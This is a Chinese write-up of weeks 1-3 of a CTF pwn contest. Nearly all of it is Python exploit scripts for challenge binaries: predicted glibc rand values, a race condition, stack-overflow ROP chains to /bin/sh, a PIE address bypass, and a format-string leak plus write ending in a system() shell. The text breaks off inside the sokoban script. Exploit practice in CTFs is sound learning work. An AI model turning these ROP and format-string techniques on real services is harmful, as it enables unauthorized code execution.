因为都比较简单,所以基本都是直接摆 exp.py,文本量会比较少。
week3 研究强网杯去了所以打的晚了点(
有的题出的不错,有的题根本不想做。我选 pwn 方向本来就是因为不想猜谜……
不过还是比较有收获的
[Week1]
幸运星
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-04 11:10:35

Harness settings for this challenge: target binary, matching libc, remote
endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "110509_pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30555
# Only consulted by the DOCKER branch of start(); left empty here.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b time
c
nextret
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
# 0x68e0905b
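def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p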
from ctypes import CDLL, c_uint, c_int, c_void_p, c_long

# Bind srand/rand/time from the same libc the target uses (system libc when no
# path is configured) so the generated sequence matches the remote's.
lib = CDLL(libcname or "libc.so.6")
srand, rand, time_fn = lib.srand, lib.rand, lib.time
srand.argtypes = [c_uint]
rand.restype = c_int
time_fn.argtypes = [c_void_p]
time_fn.restype = c_long


def itob(x):
    """Encode ``str(x)`` as bytes for sending over the tube."""
    return str(x).encode()
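def glibc_rand_seq(seed, length=51, modulus=53, offset=7):
    """Return ``length`` values of ``rand() % modulus + offset`` after ``srand(seed)``.

    ``seed`` is truncated to 32 bits the way ``srand`` would.  The defaults
    reproduce the original hard-coded ``% 53 + 7`` (values 7..59, inside the
    prompt's 0-60 range); ``modulus``/``offset`` are parameters so the helper
    can be reused for other reduction schemes.
    """
    srand(c_uint(seed & 0xffffffff))
    return [rand() % modulus + offset for _ in range(length)]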
io = start()
io.success("genete")
cnt = 0
# Seed with the solver's own time(NULL); this assumes the target seeds the same
# way within the same second — TODO confirm how much clock skew is tolerated.
seed = time_fn(0)
seq = glibc_rand_seq(seed)
io.success(str(len(seq)))
io.recvuntil(b"Pay attention to that guy called libc, I think you'll like it\n")
for val in seq:
    io.sendlineafter(b"Please enter a number (0-60):", itob(val))
    cnt+=1
    sleep(0.5)
    io.success(str(cnt))
    print(seq)
    # 50 answers is the stop condition; the 51st generated value is never sent.
    if (cnt == 50 ):
        io.interactive()
        break
no vuln
简单条件竞争,部分代码 ai 写的所以可能有点难用(
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-04 10:41:20

Harness settings for this challenge: target binary, matching libc, remote
endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "102218_NoVuln_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30268
# Unused here: this script's start() has no docker attach path.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b main
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
def start():
    """Open the target per the pwncli ``args`` flags and return the tube.

    GDB runs the local binary under gdb with ``gs``, REMOTE connects to
    ``host``:``port``, anything else is a plain local process.  DOCKER is not
    supported by this harness and raises NotImplementedError.
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if args.DOCKER:
        raise NotImplementedError("docker racing is not supported in this harness")
    return process(elf.path)
# Shared stop flag: set by the reader on a hit (or by __main__) so every worker loop exits.
stop_evt = threading.Event()
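def writer_worker():
    """Writer side of the race: reconnect and send the 'W' request until ``stop_evt`` is set.

    Each iteration opens its own tube and always closes it.  Errors from a
    single iteration are logged and the loop continues; in the original any
    exception escaped the ``try``/``finally`` and silently killed the thread,
    leaving fewer writers than intended.
    """
    while not stop_evt.is_set():
        io = None
        try:
            io = start()
            io.sendlineafter(b"If you somehow manage to trigger the impossible, you might just get a surprise...\n",b"W"*0x100)
            io.recvall(timeout=3)
        except Exception as exc:
            log.warning("writer iteration failed: %s", exc)
            # Back off briefly so a dead endpoint does not spin the thread; returns early on stop.
            stop_evt.wait(0.2)
        finally:
            if io is not None:
                try:
                    io.close()
                except Exception:
                    pass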
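def reader_worker():
    """Reader side of the race: send the 'R' request until the flag marker appears or ``stop_evt`` is set.

    Runs on the main thread (see ``__main__``).  On a hit the data is logged,
    ``stop_evt`` is set and the function returns.  Per-iteration errors are
    logged and the loop continues; the original let them kill the loop.
    """
    while not stop_evt.is_set():
        io = None
        try:
            io = start()
            io.sendlineafter(b"If you somehow manage to trigger the impossible, you might just get a surprise...\n",b"R"*0x100)
            # NOTE(review): hands the tube to the user first; the recvall/flag
            # check below only runs after interactive() returns.  Kept as written.
            io.interactive()
            # sl(b"cat flag")
            data = io.recvall(timeout=5)
            if b"IM_FLAG" in data:
                log.success("Hit: " + repr(data))
                stop_evt.set()
                return
        except Exception as exc:
            log.warning("reader iteration failed: %s", exc)
            stop_evt.wait(0.2)
        finally:
            if io is not None:
                try:
                    io.close()
                except Exception:
                    pass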
if __name__ == "__main__":
    # Three daemon writers race against the reader, which runs on this thread.
    writers = []
    for _ in range(3):
        worker = threading.Thread(target=writer_worker, daemon=True)
        writers.append(worker)
    for worker in writers:
        worker.start()
    reader_worker()
    stop_evt.set()
    # Short join: the writers are daemons, so a slow close does not block exit.
    for worker in writers:
        worker.join(timeout=0.2)
危险的 gets
裸的栈溢出,因为简单的栈溢出太多了所以找不到exp了(
count
python有个好用的函数叫做eval.
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-09-20 13:59:48

Harness settings for this challenge.  The binary/ELF lines are commented out,
so only the REMOTE path of start() is usable as written.
'''
from pwncli import *

# filename = "pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30674
container_id = ""
proc_name = ""

# elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b main
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
c
c
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
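def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    NOTE: this script leaves ``filename``/``elf`` commented out, so the GDB and
    default branches (``elf.path``) raise NameError; only REMOTE works as written.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p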
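p = start()
ia = lambda : p.interactive()
sla = lambda x,y: p.sendlineafter(x,y)
sa = lambda x,y: p.sendafter(x,y)
ru = lambda x: p.recvuntil(x)
r = lambda x : p.recv()[:x]
rl = lambda x : p.recvline()[:x]
s = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
itob = lambda x : str(x).encode()


def _eval_arith(expr):
    """Evaluate a plain arithmetic expression received from the server without ``eval``.

    Accepts numeric literals, unary +/- and the binary operators + - * / // % **
    (exponents capped at 64); anything else raises ValueError.  The original
    passed the raw server text to ``eval()``, which lets whoever controls the
    service run arbitrary Python on the solver's machine.  Exact expression
    shape from the server is not known here — TODO extend if it uses more.
    """
    import ast
    import operator
    bin_ops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.FloorDiv: operator.floordiv,
        ast.Mod: operator.mod,
        ast.Pow: operator.pow,
    }
    un_ops = {ast.UAdd: operator.pos, ast.USub: operator.neg}

    def walk(node):
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in bin_ops:
            left, right = walk(node.left), walk(node.right)
            if isinstance(node.op, ast.Pow) and abs(right) > 64:
                raise ValueError(f"exponent too large in {expr!r}")
            return bin_ops[type(node.op)](left, right)
        if isinstance(node, ast.UnaryOp) and type(node.op) in un_ops:
            return un_ops[type(node.op)](walk(node.operand))
        raise ValueError(f"unsupported expression: {expr!r}")

    return walk(ast.parse(expr.strip(), mode="eval").body)


sl(b'4100625')
ru("Are you ready?\n")
for _ in range(20):
    # Each round: up to 16 bytes of expression text, optionally ending in '='.
    expr = r(16).decode()
    if expr.endswith('='):
        expr = expr[:-1]
    print(expr)
    # Answer is sent as 0x-prefixed hex, as in the original.
    sl(itob(hex(_eval_arith(expr))))
    ru(b"correct!\n")
ia()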
[Week2]
stackoverflow
有野生binsh字符串
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-11 10:29:12

Harness settings for this challenge: target binary, matching libc, remote
endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "100813_pwwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30168
# Only consulted by the DOCKER branch of start(); left empty here.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b main
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
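def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p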
p = start()


# Tube helpers; the exploit body below relies on these exact names.
def ia():
    return p.interactive()


def sla(x, y):
    return p.sendlineafter(x, y)


def sa(x, y):
    return p.sendafter(x, y)


def ru(x):
    return p.recvuntil(x)


def r(x):
    # Note: receives whatever is available and slices it, not a fixed-length read.
    return p.recv()[:x]


def s(x):
    return p.send(x)


def sl(x):
    return p.sendline(x)


def itob(x):
    return str(x).encode()
# Your exploit here
# Static (non-PIE) addresses taken from the binary.
pop_rdi_ret = 0x0000000000401332
bin_sh = 0x4035C8
back = 0x40132D
# 0x13 bytes of buffer plus the saved rbp, then the chain; flat() packs the
# ints as 64-bit little-endian under the amd64 context, same as p64().
pay = flat([b'A' * (0x13 + 0x8), pop_rdi_ret, bin_sh, back])
p.recvuntil("2. The power of water\n")
p.sendline(b'1')
p.sendlineafter("[Yes/No]>>", b'No')
p.recvuntil("pls show the GOD your power >>")
p.sendline(pay)
p.interactive()
where are my addr
开了 pie 但给了 main 基址
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-11 10:14:13

Harness settings for this challenge: target binary, matching libc, remote
endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "101302_pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30137
# Only consulted by the DOCKER branch of start(); left empty here.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b main
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
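def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p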
p = start()


# Tube helpers; the exploit body below relies on these exact names.
def ia():
    return p.interactive()


def sla(x, y):
    return p.sendlineafter(x, y)


def sa(x, y):
    return p.sendafter(x, y)


def ru(x):
    return p.recvuntil(x)


def r(x):
    # Receives whatever is available and slices it, not a fixed-length read.
    return p.recv()[:x]


def s(x):
    return p.send(x)


def sl(x):
    return p.sendline(x)


def itob(x):
    return str(x).encode()
# Your exploit here
p.recvuntil("this is a gift for you :main_addr: ")
# main_addr = u64(rl(-1).ljust(0x8,b'\0'))
# The service prints main's address as text; r(-1) drops the trailing byte and
# the first 14 characters ("0x" + 12 hex digits) are parsed.
main_addr = int(r(-1)[:14], 16)
print(main_addr)
# Target = main + (0x11c9 - 0x126c) + 8; the offsets come from the binary and
# are kept as in the original — purpose of the +8 not derivable here.
target = main_addr + 0x11c9 - 0x126c + 0x8
pay = b'a' * 0x48 + p64(target)
p.sendline(pay)
p.interactive()
bird
假 canary,当一般栈溢出打就行(
[Week3]
fmt
简单格式化字符串
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-20 20:29:27

Harness settings for this challenge: target binary, matching libc (2.27),
remote endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "pwn_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6_2.27-3ubuntu1.6_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30754
# Only consulted by the DOCKER branch of start(); left empty here.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b main
# b printf
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6-dbg_2.27-3ubuntu1.6_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/glibc-source_2.27-3ubuntu1.6_all/usr/src/glibc/glibc-2.27
c
c
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
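def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p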
p = start()


# Tube helpers; the helpers and exploit body below rely on these exact names.
def ia():
    return p.interactive()


def sla(x, y):
    return p.sendlineafter(x, y)


def sa(x, y):
    return p.sendafter(x, y)


def ru(x):
    return p.recvuntil(x)


def r(x):
    return p.recv(x)


def rl(x):
    return p.recvline()[:x]


def s(x):
    return p.send(x)


def sl(x):
    return p.sendline(x)


def itob(x):
    return str(x).encode()


def u64_ex(x):
    # Zero-pad short leaks to 8 bytes before unpacking.
    return u64(x.ljust(8, b'\0'))
def change(s):
    """Menu option 2: replace the stored name with ``s``."""
    p.sendlineafter("Enter your choice: ", b'2')
    p.sendlineafter("Enter new name: ", s)
def greet():
    """Menu option 1: print the greeting that includes the stored name."""
    p.sendlineafter("Enter your choice: ", b'1')
def bye():
    """Menu option 3: leave the menu loop."""
    p.sendlineafter("Enter your choice: ", b'3')
# Your exploit here
# First value is the generic probe used while locating offsets; it is
# immediately replaced by the targeted format string actually sent.
pay = b"%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p"
pay = b"%6$p-%27$p-%25$p-%9$p"
sla("Enter your name: ",pay)
# stack at 6, input at 12.
greet()
ru("hello, ")
# Four '-'-separated hex values come back: a stack address, a libc address
# (0x21c87 is the offset to libc base in this 2.27 build — TODO confirm),
# the canary (18 chars incl. 0x) and main's address.
stack_addr = int(r(14),16)
ru('-')
libc_addr = int(r(14),16) - 0x21c87
ru('-')
canary = int(r(18),16)
ru('-')
main_addr = int(r(14),16)
# 0x12f7 / 0x4010 are main's and the target variable's offsets in the binary (assumed).
flag_addr = main_addr - 0x12f7 + 0x4010
# %hn write of 4660 (0x1234) through argument 14, whose slot holds flag_addr.
change(b'%4660c%14$hn'.ljust(0x10,b'\0') + p64(flag_addr))
greet()
# libc offsets for this build — taken as given in the original.
bin_sh = libc_addr + 0x1b3d88
pop_rdi_ret = libc_addr + 0x2164f
system = libc_addr + 0x4f420
ret = libc_addr + 0xb1485
pay = flat([
    b'a'*0x68,
    canary,
    b'b'*0x8,
    pop_rdi_ret,
    bin_sh,
    ret,
    system
])
bye()
s(pay)
sleep(1)
sl("cat flag")
p.success(hex(stack_addr))
p.success(hex(libc_addr))
p.success(hex(canary))
p.success(hex(main_addr))
ia()
key 的大冒险(1)
可以无限 equip 物品
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-20 19:45:21

Harness settings for this challenge: target binary, matching libc, remote
endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "190435_adventure1_patched"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30526
# Only consulted by the DOCKER branch of start(); left empty here.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands executed on attach.
gs = '''
b main
set debug-file-directory /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6-dbg_2.35-0ubuntu3_amd64/usr/lib/debug
set directories /home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/glibc-source_2.35-0ubuntu3_all/usr/src/glibc/glibc-2.35
c
c
'''
context.update(log_level='debug', terminal=['tmux', 'splitw', '-h'], arch='amd64')
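def start():
    """Open the target according to the pwncli ``args`` flags and return the tube.

    GDB     -> run the local binary under gdb with script ``gs``.
    REMOTE  -> connect to ``host``:``port``.
    DOCKER  -> connect remotely, then attach gdb (via sudo) to the process named
               ``proc_name`` inside container ``container_id``.
    default -> plain local process.

    Raises RuntimeError in DOCKER mode when no matching process exists or the
    chosen index is out of range (the original fell through to an IndexError).
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    if not args.DOCKER:
        return process(elf.path)

    import docker
    import tempfile
    from os import path

    p = remote(host, port)
    client = docker.from_env()
    container = client.containers.get(container_id=container_id)
    processes_info = container.top()
    titles = processes_info['Titles']
    processes = [dict(zip(titles, proc)) for proc in processes_info['Processes']]
    # Match on the basename of the first word of each process' CMD column.
    target_proc = []
    for proc in processes:
        cmd = proc.get('CMD', '')
        exe_path = cmd.split()[0] if cmd else ''
        if path.basename(exe_path) == proc_name:
            target_proc.append(proc)
    if not target_proc:
        p.close()
        raise RuntimeError(f"no process named {proc_name!r} found in container {container_id!r}")
    idx = 0
    if len(target_proc) > 1:
        for i, v in enumerate(target_proc):
            print(f"{i} => {v}")
        idx = int(input("Which one:"))
        if not 0 <= idx < len(target_proc):
            p.close()
            raise RuntimeError(f"index {idx} out of range (0-{len(target_proc) - 1})")
    # delete=False because gdb removes the script itself via the leading "shell rm".
    with tempfile.NamedTemporaryFile(prefix='cpwn-gdbscript-', delete=False, suffix='.gdb', mode='w') as tmp:
        tmp.write(f'shell rm {tmp.name}\n{gs}')
        print(tmp.name)
    run_in_new_terminal(["sudo", "gdb", "-p", target_proc[idx]['PID'], "-x", tmp.name])
    return p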
p = start()


# Tube helpers; the helpers and exploit body below rely on these exact names.
def ia():
    return p.interactive()


def sla(x, y):
    return p.sendlineafter(x, y)


def sa(x, y):
    return p.sendafter(x, y)


def ru(x):
    return p.recvuntil(x)


def r(x):
    return p.recv(x)


def rl(x):
    return p.recvline()[:x]


def s(x):
    return p.send(x)


def sl(x):
    return p.sendline(x)


def itob(x):
    return str(x).encode()


def u64_ex(x):
    # Zero-pad short leaks to 8 bytes before unpacking.
    return u64(x.ljust(8, b'\0'))
# Your exploit here
def buy(i):
    """Menu option 6: equip item number ``i`` (1-3) and skip the chief's dialogue."""
    p.sendlineafter("Choose an option:", b'6')
    p.sendlineafter("Enter the number of the item you want to equip (1-3):", itob(i))
    p.sendlineafter("You want to say something to the village chief: ", b'\n')
# Equip every item repeatedly (the binary does not cap equips), then pick option 1.
# Indentation was lost in the listing; all three buy() calls are taken as loop body.
for _ in range(100):
    for item in (1, 2, 3):
        buy(item)
p.sendlineafter("Choose an option:", b'1')
p.interactive()
sokoban
审计二进制文件,发现右下角的目标位置可以无限刷分。
#!/usr/bin/env python3
'''
author: Yoisaki_Kanade
time: 2025-10-21 16:54:47

Harness settings for this challenge: target binary, matching libc, remote
endpoint and the gdb script consumed by start().
'''
from pwncli import *

filename = "165144_pwwn"
libcname = "/home/yoisaki_kanade/.config/cpwn/pkgs/2.35-0ubuntu3/amd64/libc6_2.35-0ubuntu3_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "challenge.ilovectf.cn"
port = 30826
# Only consulted by the DOCKER branch of start(); left empty here.
container_id = ""
proc_name = ""

elf = context.binary = ELF(filename)
if libcname:
